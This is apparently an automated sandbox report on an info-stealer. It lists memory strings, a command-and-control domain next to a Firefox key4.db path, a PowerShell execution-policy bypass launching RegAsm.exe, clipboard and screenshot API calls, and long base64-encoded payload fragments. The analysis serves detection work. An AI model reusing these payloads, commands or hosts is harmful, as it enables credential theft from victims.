                      Source: powershell.exe, 00000004.00000002.4098845897.000000000053E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: RegAsm.exe, 00000007.00000002.4207908968.0000000000E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4105365673.0000000006D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
                      Source: powershell.exe, 00000004.00000002.4100255079.00000000046E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4105365673.0000000006D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
                      Source: powershell.exe, 00000004.00000002.4098845897.000000000053E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                      Source: powershell.exe, 00000004.00000002.4100255079.00000000046E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4105365673.0000000006D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
                      Source: powershell.exe, 00000004.00000002.4100255079.000000000504B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: RegAsm.exe, 00000007.00000002.4207908968.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/
                      Source: RegAsm.exe, 00000007.00000002.4210634675.0000000003379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/V
                      Source: RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
                      Source: RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/apiP
                      Source: RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/apiflaU.d
                      Source: RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/pR)D#=
                      Source: RegAsm.exe, 00000007.00000002.4210550709.0000000003365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz:443/api7uiqa8.default-release/key4.dbPK
                      Source: RegAsm.exe, 00000007.00000002.4210550709.0000000003365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz:443/apil
                      Source: powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000004.00000002.4098845897.000000000053E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49717 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49718 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_004310D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_004310D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,7_2_00431839

                      System Summary

                      barindex
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
                      Source: Process Memory Space: powershell.exe PID: 5040, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: 4.2.powershell.exe.8680000.3.raw.unpack, Sap.csLong String: Length: 18812
                      Source: 4.2.powershell.exe.4d8ab64.2.raw.unpack, Sap.csLong String: Length: 18812
                      Source: 4.2.powershell.exe.4a3acb0.0.raw.unpack, Sap.csLong String: Length: 18812
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043D8307_2_0043D830
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004210E07_2_004210E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043D0A07_2_0043D0A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040C9177_2_0040C917
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004361E07_2_004361E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004259907_2_00425990
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004152987_2_00415298
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042B4FC7_2_0042B4FC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040DD257_2_0040DD25
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00422E937_2_00422E93
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00438EA07_2_00438EA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00435EA07_2_00435EA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00415F667_2_00415F66
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004197707_2_00419770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004087907_2_00408790
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004260547_2_00426054
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043B0687_2_0043B068
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004140707_2_00414070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043C0207_2_0043C020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004398307_2_00439830
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041B0E17_2_0041B0E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041F0E07_2_0041F0E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004358907_2_00435890
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004340987_2_00434098
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004180A97_2_004180A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040A9407_2_0040A940
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041714B7_2_0041714B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004081607_2_00408160
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042B12C7_2_0042B12C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042F1307_2_0042F130
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004039C07_2_004039C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042B1C07_2_0042B1C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041D9E07_2_0041D9E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004111E57_2_004111E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004059F07_2_004059F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004239F27_2_004239F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043C1F07_2_0043C1F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040F9FD7_2_0040F9FD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043B9A17_2_0043B9A1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004062507_2_00406250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041D2707_2_0041D270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00424A747_2_00424A74
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004092307_2_00409230
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00423A347_2_00423A34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004192DA7_2_004192DA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043D2F07_2_0043D2F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043C2807_2_0043C280
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004252BA7_2_004252BA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004043707_2_00404370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041CB057_2_0041CB05
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00428BC07_2_00428BC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004143C27_2_004143C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00402BD07_2_00402BD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00428BE97_2_00428BE9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004373997_2_00437399
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004393A07_2_004393A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00416BA57_2_00416BA5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004293AA7_2_004293AA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004223B87_2_004223B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040B44C7_2_0040B44C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00436C007_2_00436C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004234107_2_00423410
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00404CB07_2_00404CB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004074B07_2_004074B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041DD507_2_0041DD50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004185787_2_00418578
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042D57E7_2_0042D57E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004245027_2_00424502
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00421D107_2_00421D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041D5E07_2_0041D5E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004175827_2_00417582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043D5807_2_0043D580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00427DA27_2_00427DA2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004205B07_2_004205B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042C64A7_2_0042C64A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00426E507_2_00426E50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042B4F77_2_0042B4F7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043462A7_2_0043462A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004356307_2_00435630
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004066E07_2_004066E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042C6E47_2_0042C6E4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00430EF07_2_00430EF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004256F97_2_004256F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00425E907_2_00425E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004156A07_2_004156A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041BEA07_2_0041BEA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00405EB07_2_00405EB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041C6BB7_2_0041C6BB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004097007_2_00409700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042C7267_2_0042C726
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042C7357_2_0042C735
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041DF807_2_0041DF80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00402FA07_2_00402FA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00414060 appears 74 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00407F70 appears 46 times
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: Process Memory Space: powershell.exe PID: 5040, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: 4.2.powershell.exe.8680000.3.raw.unpack, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
                      Source: 4.2.powershell.exe.8680000.3.raw.unpack, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
                      Source: 4.2.powershell.exe.4d8ab64.2.raw.unpack, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhS